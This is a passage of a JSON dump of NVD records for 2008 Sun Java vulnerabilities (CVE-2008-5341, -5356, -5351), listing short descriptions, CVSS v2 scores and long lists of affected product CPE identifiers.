"cpe:2.3:a:sun:jre:1.5.0:-:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:-:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:-:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:-:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update7_b03:*:*:*:*:*:*", 
"cpe:2.3:a:sun:sdk:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:26", "description": "Unspecified vulnerability in Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier, and JDK and JRE 5.0 Update 16 and earlier, allows untrusted JWS applications to obtain the pathname of the JWS cache and the application username via unknown vectors, aka CR 6727071.", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5341", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5341"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:6", "cpe:/a:sun:jre:1.4.2_17", 
"cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:5.0", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jdk:5.0", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:jdk:6", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5341", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5341", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_7:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:27", "description": "Heap-based buffer overflow in Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier might allow remote attackers to execute arbitrary code via a crafted TrueType font file.", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5356", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, 
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5356"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:6", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:5.0", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jdk:5.0", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:jdk:6", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5356", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5356", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", 
"cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_2:*:*:*:*:*:*", 
"cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:26", "description": "Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier accepts UTF-8 encodings that are not the \"shortest\" form, which makes it easier for attackers to bypass protection mechanisms for other applications that rely on shortest-form UTF-8 encodings.", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": 
"CVE-2008-5351", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5351"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:6", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:5.0", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jdk:5.0", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:jdk:6", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5351", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5351", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_2:*:*:*:*:*:*", 
